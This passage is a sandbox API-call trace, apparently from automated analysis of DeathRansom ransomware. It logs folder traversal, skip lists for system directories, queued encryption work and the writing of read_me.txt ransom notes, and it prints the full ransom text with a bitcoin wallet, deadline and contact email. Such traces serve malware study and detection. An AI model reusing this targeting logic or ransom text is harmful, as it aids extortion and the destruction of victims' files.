ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.972] WriteFile (in: hFile=0x7fc, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.973] CloseHandle (hObject=0x7fc) returned 1 [0075.973] GetProcessHeap () returned 0x4f10000 [0075.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8de1100 | out: hHeap=0x4f10000) returned 1 [0075.973] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2afe550, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2afe550, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Videos", cAlternateFileName="")) returned 1 [0075.973] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 40 [0075.973] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0075.974] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0075.974] StrStrW (lpFirst="videos", lpSrch="programdata") returned 0x0 [0075.974] StrStrW (lpFirst="videos", lpSrch="$recycle.bin") returned 0x0 [0075.974] StrStrW (lpFirst="videos", lpSrch="program files") returned 0x0 [0075.974] StrStrW (lpFirst="videos", lpSrch="windows") returned 0x0 [0075.974] StrStrW (lpFirst="videos", lpSrch="all users") returned 0x0 [0075.974] StrStrW (lpFirst="videos", lpSrch="appdata") returned 0x0 [0075.974] GetProcessHeap () returned 0x4f10000 [0075.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8de1100 [0075.974] lstrcpyW (in: lpString1=0x8de1100, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0075.974] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 87 [0075.974] QueueUserWorkItem (Function=0x40a710, Context=0x8de1100, Flags=0x0) returned 1 [0075.974] GetProcessHeap () returned 0x4f10000 [0075.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8df1108 [0075.975] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 42 [0075.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.975] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.") returned 42 [0075.975] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.975] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.975] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.975] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\..") returned 43 [0075.975] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.975] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x4b234770, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x4b234770, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="5M36w1U 5ymSEb", cAlternateFileName="5M36W1~1")) returned 1 [0075.975] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb") returned 55 [0075.975] lstrcmpW (lpString1="5M36w1U 5ymSEb", lpString2="..") returned 1 [0075.976] lstrcmpW (lpString1="5M36w1U 5ymSEb", lpString2=".") returned 1 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="programdata") returned 0x0 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="$recycle.bin") returned 0x0 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="program files") returned 0x0 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="windows") returned 0x0 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="all users") returned 0x0 [0075.976] StrStrW (lpFirst="5m36w1u 5ymseb", lpSrch="appdata") returned 0x0 [0075.976] GetProcessHeap () returned 0x4f10000 [0075.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e01110 [0075.977] lstrcpyW (in: lpString1=0x8e01110, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb" [0075.977] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 88 [0075.977] QueueUserWorkItem (Function=0x40a710, Context=0x8e01110, Flags=0x0) returned 1 [0075.977] GetProcessHeap () returned 0x4f10000 [0075.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e11118 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\*") returned 57 [0075.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x4b234770, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x4b234770, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\.") returned 57 [0075.978] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.978] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x4b234770, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x4b234770, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\..") returned 58 [0075.978] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3b32f50, ftCreationTime.dwHighDateTime=0x1d4d221, ftLastAccessTime.dwLowDateTime=0x17bfa230, ftLastAccessTime.dwHighDateTime=0x1d4c682, ftLastWriteTime.dwLowDateTime=0x17bfa230, ftLastWriteTime.dwHighDateTime=0x1d4c682, nFileSizeHigh=0x0, nFileSizeLow=0x5597, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="-bV2q.swf", cAlternateFileName="")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\-bV2q.swf") returned 65 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd00c30, ftCreationTime.dwHighDateTime=0x1d4cdd8, ftLastAccessTime.dwLowDateTime=0x7da357c0, ftLastAccessTime.dwHighDateTime=0x1d4d3c2, ftLastWriteTime.dwLowDateTime=0x7da357c0, ftLastWriteTime.dwHighDateTime=0x1d4d3c2, nFileSizeHigh=0x0, nFileSizeLow=0x82a4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0RGelJCdJIVq8dRZcY.mp4", cAlternateFileName="0RGELJ~1.MP4")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\0RGelJCdJIVq8dRZcY.mp4") returned 78 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3d97a0, ftCreationTime.dwHighDateTime=0x1d4d411, ftLastAccessTime.dwLowDateTime=0x87bb6fb0, ftLastAccessTime.dwHighDateTime=0x1d4d258, ftLastWriteTime.dwLowDateTime=0x87bb6fb0, ftLastWriteTime.dwHighDateTime=0x1d4d258, nFileSizeHigh=0x0, nFileSizeLow=0x16e69, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2AssQPXs63.swf", cAlternateFileName="2ASSQP~1.SWF")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\2AssQPXs63.swf") returned 70 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e85b60, ftCreationTime.dwHighDateTime=0x1d4cf30, ftLastAccessTime.dwLowDateTime=0x2b0cdc30, ftLastAccessTime.dwHighDateTime=0x1d4cfcf, ftLastWriteTime.dwLowDateTime=0x2b0cdc30, ftLastWriteTime.dwHighDateTime=0x1d4cfcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fzYLz2.avi", cAlternateFileName="")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\fzYLz2.avi") returned 66 [0075.978] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8d84e0, ftCreationTime.dwHighDateTime=0x1d4d4e3, ftLastAccessTime.dwLowDateTime=0xc69f3280, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xc69f3280, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x18bff, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Nj6U RSGNSkWm7K L4 -.mkv", cAlternateFileName="NJ6URS~1.MKV")) returned 1 [0075.978] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\Nj6U RSGNSkWm7K L4 -.mkv") returned 80 [0075.979] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cc0bce0, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xd4d08b60, ftLastAccessTime.dwHighDateTime=0x1d4cb31, ftLastWriteTime.dwLowDateTime=0xd4d08b60, ftLastWriteTime.dwHighDateTime=0x1d4cb31, nFileSizeHigh=0x0, nFileSizeLow=0x1072, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oAC5gF9FT_zMLA46oG.swf", cAlternateFileName="OAC5GF~1.SWF")) returned 1 [0075.979] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\oAC5gF9FT_zMLA46oG.swf") returned 78 [0075.979] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d40ee20, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xda4a8fb0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0xda4a8fb0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x12e35, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YePQg6Yawc.mkv", cAlternateFileName="YEPQG6~1.MKV")) returned 1 [0075.979] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\YePQg6Yawc.mkv") returned 70 [0075.979] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d40ee20, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xda4a8fb0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0xda4a8fb0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x12e35, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YePQg6Yawc.mkv", cAlternateFileName="YEPQG6~1.MKV")) returned 0 [0075.979] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.979] wnsprintfW (in: pszDest=0x8e11118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\read_me.txt") returned 67 [0075.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x804 [0075.979] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.979] WriteFile (in: hFile=0x804, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.980] CloseHandle (hObject=0x804) returned 1 [0075.980] GetProcessHeap () returned 0x4f10000 [0075.980] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e11118 | out: hHeap=0x4f10000) returned 1 [0075.980] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3684e0e0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x3000c0f0, ftLastAccessTime.dwHighDateTime=0x1d4cee7, ftLastWriteTime.dwLowDateTime=0x3000c0f0, ftLastWriteTime.dwHighDateTime=0x1d4cee7, nFileSizeHigh=0x0, nFileSizeLow=0x140a7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ALs9oCV.swf", cAlternateFileName="")) returned 1 [0075.980] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ALs9oCV.swf") returned 52 [0075.980] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.980] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0075.980] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe903a240, ftCreationTime.dwHighDateTime=0x1d4cd0f, ftLastAccessTime.dwLowDateTime=0x488a6660, ftLastAccessTime.dwHighDateTime=0x1d4c5b1, ftLastWriteTime.dwLowDateTime=0x488a6660, ftLastWriteTime.dwHighDateTime=0x1d4c5b1, nFileSizeHigh=0x0, nFileSizeLow=0x5989, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ElUpMiVOtav5PaLlw5.swf", cAlternateFileName="ELUPMI~1.SWF")) returned 1 [0075.980] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ElUpMiVOtav5PaLlw5.swf") returned 63 [0075.980] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x660a7d30, ftCreationTime.dwHighDateTime=0x1d4cd9d, ftLastAccessTime.dwLowDateTime=0xeeeb6bb0, ftLastAccessTime.dwHighDateTime=0x1d4c8ec, ftLastWriteTime.dwLowDateTime=0xeeeb6bb0, ftLastWriteTime.dwHighDateTime=0x1d4c8ec, nFileSizeHigh=0x0, nFileSizeLow=0xcbc9, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="G4dr.mkv", cAlternateFileName="")) returned 1 [0075.981] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G4dr.mkv") returned 49 [0075.981] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x838f5ab0, ftLastAccessTime.dwHighDateTime=0x1d4d333, ftLastWriteTime.dwLowDateTime=0x838f5ab0, ftLastWriteTime.dwHighDateTime=0x1d4d333, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="LeWhSQT", cAlternateFileName="")) returned 1 [0075.981] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT") returned 48 [0075.981] lstrcmpW (lpString1="LeWhSQT", lpString2="..") returned 1 [0075.981] lstrcmpW (lpString1="LeWhSQT", lpString2=".") returned 1 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="programdata") returned 0x0 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="$recycle.bin") returned 0x0 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="program files") returned 0x0 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="windows") returned 0x0 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="all users") returned 0x0 [0075.981] StrStrW (lpFirst="lewhsqt", lpSrch="appdata") returned 0x0 [0075.981] GetProcessHeap () returned 0x4f10000 [0075.981] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e11118 [0075.981] lstrcpyW (in: lpString1=0x8e11118, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT" [0075.981] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 89 [0075.981] QueueUserWorkItem (Function=0x40a710, Context=0x8e11118, Flags=0x0) returned 1 [0075.981] GetProcessHeap () returned 0x4f10000 [0075.981] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e21120 [0075.982] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\*") returned 50 [0075.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x838f5ab0, ftLastAccessTime.dwHighDateTime=0x1d4d333, ftLastWriteTime.dwLowDateTime=0x838f5ab0, ftLastWriteTime.dwHighDateTime=0x1d4d333, nFileSizeHigh=0x0, nFileSizeLow=0x0, 